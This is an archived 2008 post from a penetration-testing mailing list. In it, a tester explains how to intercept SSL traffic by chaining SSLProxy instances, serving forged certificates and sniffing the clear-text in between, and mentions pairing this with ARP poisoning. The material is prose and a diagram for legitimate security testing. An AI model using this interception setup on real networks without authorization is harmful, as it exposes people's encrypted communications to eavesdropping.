Penetration Testing mailing list archives

RE: SSL MITM not on port 443

From: Frank Knobbe <frank () knobbe us>
Date: Fri, 29 Aug 2008 20:58:29 -0500

On Thu, 2008-08-28 at 15:56 +0200, christopher.riley () r-it at wrote:

I've confirmed that I can get this working on a normal SSL based web 
server (obviously by agreeing to the insecure certificate). However I 
still had no luck with Ettercap on this service. I'm trying now with an 
iptables rule to forward between port 443 on the MITM machine to the 
target server on a higher port. It's just getting a chance to squeeze it 
in amongst the other things that need doing. I'll set aside some time at 
the weekend to throw this on my lab system at home and get it working 
somehow.


Why so complicated? Intercepting SSL with the ability to serve your own
certificates is easily done with SSLProxy. Older versions only proxied
clear-text listener ports into an SSL connection and you needed to use
OpenSSL to do the reverse. But newer versions of SSLProxy also allow you
to supply a certificate and listen as an SSL endpoint connecting back to
a clear-text port.


(client) --[SSL]--> (server)

To intercept, change to:

(client) --[SSL]--> (SSLProxy) --[clear-text]--> (SSLProxy) --[SSL]-->
(server)

You can sniff the traffic between the SSLProxies for clear-text
analysis. Further, you can configure the left-side SSLProxy with any
certificate you create. That should allow you to test if your client
application handles invalid certificates correctly.

I've used SSLProxy and OpenSSL in pentests almost a decade ago before
ready-made SSL MITM tools like dsniff were available. They work quite
nicely. You can run them both on the same machine. However, in one
instance, I needed to permit a 2nd and 3rd machine to sniff the
intercepted clear-text traffic, so we ran SSLProxy on one box and
OpenSSL on another, and transmitted the clear-text across a hub that
allowed the other machines to sniff the traffic too. A handy setup,
especially when combined with ARP poisoning :)

Cheers,
Frank

Attachment: signature.asc
Description: This is a digitally signed message part

Current thread:

SSL MITM not on port 443 christopher . riley (Aug 27)
- RE: SSL MITM not on port 443 Robbie Gill (Aug 27)
  - Re: SSL MITM not on port 443 James Matthews (Aug 27)
  - RE: SSL MITM not on port 443 christopher . riley (Aug 28)
    - Re: SSL MITM not on port 443 Roman Fulop (Aug 28)
    - Re: SSL MITM not on port 443 Ahmad Taha (Aug 28)
    - RE: SSL MITM not on port 443 Shenk, Jerry A (Aug 29)
    - RE: SSL MITM not on port 443 christopher . riley (Aug 29)
    - RE: SSL MITM not on port 443 Frank Knobbe (Aug 30)